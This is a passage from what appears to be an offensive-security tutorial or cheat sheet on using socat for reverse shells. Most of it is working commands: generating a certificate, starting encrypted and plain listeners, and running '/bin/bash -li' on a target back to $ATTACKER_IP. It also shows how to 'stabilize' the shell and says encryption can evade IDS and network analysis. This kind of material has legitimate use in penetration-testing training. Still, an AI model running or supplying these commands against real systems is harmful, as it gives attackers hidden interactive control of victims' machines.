socat gets us an interactive login shell right out the gate, though we’re still vulnerable to Ctrl+C. Note that when binding to PowerShell, use powershell.exe,pipes in order to force PowerShell to use UNIX-style STDIN/STDOUT.
How to encrypt a reverse shell connection with socat
socat can make encrypted connections, which foil after-the-fact network analysis and may circumvent IDS entirely.
# Generate a self-signed certificate.#openssl req --newkey rsa:2048 -nodes \ -keyout shell.key -x509 -days 362 \ -out shell.crt# Create a PEM file combining the certificate and key.#cat shell.key shell.crt > shell.pem# Start a listener.#socat OPENSSL-LISTEN:$LISTENER_PORT,cert=shell.pem,verify=0 -# Start the reverse shell on the target.#socat OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 EXEC:"/bin/bash -li"
The verify=0 directive turns off certificate validation, so this isn’t a “secure” connection in the sense that it’s been authenticated, but it is secure in the sense that it’s encrypted.
How to automatically stabilize a reverse shell with socat
Shell “stabilization” refers to the process of making a remote shell behave like a normal local shell — so, allowing interactive programs to work properly, ensuring that input is not echoed inappropriately, etc.
We can use socat to create an auto-stabilized reverse shell on UNIX-like systems.
# Attacker: Connect $LISTENER_PORT to the current TTY,# send raw keycodes, and turn off terminal echo.# Basically the `stty raw -echo`.#socat TCP-LISTEN:$LISTENER_PORT FILE:`tty`,raw,echo=0# Target: Connect the listener on the attacker to an# interactive login bash shell.## pty - allocate a PTTY# stderr - redirect STDERR to the attacker# sigint - pass signals (Ctrl+C) through# setsid - use a new session# sane - use a variety of tweaks to "normalize" the# terminal's environment#socat TCP:$ATTACKER_IP:$LISTENER_PORT \ EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane
Same thing, but over an encrypted connection:
# Attacker: Connect $LISTENER_PORT to the current TTY,# send raw keycodes, and turn off terminal echo. Basically# the `stty raw -echo`.#socat \ OPENSSL-LISTEN:$LISTENER_PORT,cert=$PEM_FILE,verify=0 \ FILE:`tty`,raw,echo=0# Target: Connect the listener on the attacker to an# interactive login bash shell.## pty - allocate a PTTY# stderr - redirect STDERR to the attacker# sigint - pass signals (Ctrl+C) through# setsid - use a new session# sane - use a variety of tweaks to "normalize" the# terminal's environment#socat \ OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 \ EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane
IMPORTANT
The reverse shell will not pick up on your terminal size, so you’ll need to manually specify it using stty rows and stty cols.